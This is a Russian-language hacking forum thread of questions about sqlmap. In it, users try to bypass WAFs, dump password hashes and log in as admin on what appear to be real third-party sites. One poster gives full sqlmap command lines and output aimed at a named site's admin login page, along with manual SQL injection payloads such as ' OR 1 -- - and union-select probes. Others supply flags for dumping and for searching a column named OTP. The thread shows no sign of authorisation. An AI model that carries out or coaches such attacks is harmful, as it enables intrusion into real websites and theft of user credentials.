Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Waf обходить.
     
  2. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    577
    Likes Received:
    48
    Reputations:
    0
    waf generic не разу с ним не сталкивался. под него вообще tamper есть в мапе?
     
  3. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Мап криво сливает пароли, вот так $1$JJCSUHzQ$fJoUTRgTvE\\/6CsiTRtfFC. при том каждый раз в разных местах подставляет слэшы, как можно исправить проблему? Это md5(unix) хеш
     
  4. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    использую sqlmap для вывода таблиц методом POST
    Очень смущает, что когда смотришь вручную там ошибка при поставки admin'
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

    Или пользователь не найдет если подставлять:

    Code:
    username=" or ""="&" or ""="=admin&login=1
    Sqlmap говорит вообще разные вещи

    Как вывести таблицу или хотя бы авторизоваться админом?
    И почему не выводится стандартными средствами sqlmap?


    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
    Code:
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.1.12#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [,]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 21:38:30
    
    [21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
    [21:38:31] [INFO] testing connection to the target URL
    [21:38:31] [INFO] testing if the target URL content is stable
    [21:38:32] [INFO] target URL content is stable
    [21:38:32] [INFO] testing if POST parameter 'username' is dynamic
    [21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
    [21:38:32] [INFO] POST parameter 'username' is dynamic
    [21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
    [21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:46] [WARNING] reflective value(s) found and filtering out
    [21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
    [21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
    [21:40:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
    [21:40:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:39] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [21:40:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [21:41:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    [21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
    [21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
    [21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
    [21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:06] [INFO] testing 'MySQL inline queries'
    [21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
    [21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
    [21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
    [21:43:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    [21:43:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [21:43:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
    [21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
    [21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
    [21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [21:44:14] [INFO] target URL appears to have 5 columns in query
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
    [21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
    [21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
    [21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
    [21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
    [21:45:08] [WARNING] false positive or unexploitable injection point detected
    [21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
    [21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
    [21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
    [21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable
    
    
     
  5. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    158
    Likes Received:
    41
    Reputations:
    2
    --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql -p username
    or
    --data "username=admin*&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql


    может быть waf или вообще обычная ошибка базы.
     
  6. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Ни один из пунктов выше, увы не сработал. Интересно то что ради эксперемента вбил:
    Code:
    --level=1 --risk=1 --banner -v 3 --union-cols=1-66
    --dbms="MySQL" --technique=EBU --identify-waf --no-cast
    Которые в свою очередь так же не сработали.
     
  7. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Никто не знает как мап заставить дампить не криво?
     
  8. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Может дело не в sqlmap? я бы попробовал заюзать sqlmap из другой папки, из под kali linux или вообще не sqlmap - если все тоже самое, ну дело не в мапе.
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!
    А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!
     
  10. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Делал
    Разумеется делал!

    Перебрал сначала возможность авторизации при которой выдавалое сообщение "пользователь не найдет в базе данных".
    Синтаксическая ошибка не высвечивалась. Уязвимое только поле "username", на passwd -ноль реакции.
    Code:
    ' OR '1
    ' OR 1 -- -
    " OR "" = "
    " OR 1 = 1 -- -
    '='
    'LIKE'
    '=0--+
    Затем пытался подобрать таблицы методом order by и вручную union+select+1,2,3-- и тут я везде натыкался на саму ошибку:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1
    
    Поэтому и возникает первоначальный вопрос: почему ручками вижу багу но не могу заюзать ,а sqlmap тоже вначале видит багу, а потом уже говорит - нет не бага...или дело здесь тоже не в нем.
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Кидай сылку
     
    cat1vo likes this.
  12. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    К сожалению, в ручную не особо умею. Можете подсказать, как в ручную по этапно слить базу с такой уязвимость
    Post данные
    Code:
    sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20
    Буду благодарен
     
  13. cna

    cna New Member

    Joined:
    10 Feb 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    1
    $?пм или читай https://forum.antichat.ru//threads/43966/
    исп норм соответствие урленкоде с --no-cast --hex --text-only кодировку можно указывать и енкодинг разный так же влияет при блиндах таймауты и конечно --drop-set-cookie --flush-session
     
    #653 cna, 18 Apr 2018
    Last edited: 18 Apr 2018
  14. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Code:
    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
    Эвристический анализ сообщал об уязвимости, а -v 3 говорил неа.
    Такой же результат был при
    Code:
    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1"
    --level=1 --risk=1 --banner -v 3 --union-cols=1-66
    --dbms="MySQL" --technique=EBU --identify-waf --no-cast
    Использовал параметры не только на
    Code:
    http://advert.kp.ru/admin//index.phpно и на http://advert.kp.ru/admin//login.php
    Во втором случае мне сразу говорил sqlmap, что уязвимость отсутствует.
     
  15. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?
    второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было
     
  16. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Пропиши payload, с помощью которого залез в бд
     
  17. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,174
    Reputations:
    1
    Друзья подскажите пожалуйста нашел уязвимость
    A cookie has been set without the secure flag, which means that the cookie can be accessed via unencrypted connections.
    Файл cookie установлен без безопасного флага, а это означает, что к файлу cookie можно получить доступ через незашифрованные соединения.
    Как это реализовать?
     
  18. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,174
    Reputations:
    1
    Не ругайте сторого куки эксплуатируются по запросу или по ответу сервера
    Я только учусь =(
     
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Как выглядит запрос для поиска по колонкам ?
    Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?
     
  20. Shubka75

    Shubka75 Member

    Joined:
    24 Sep 2015
    Messages:
    77
    Likes Received:
    55
    Reputations:
    30
    --search -C OTP
     
    #660 Shubka75, 20 May 2018
    Last edited: 21 May 2018
Loading...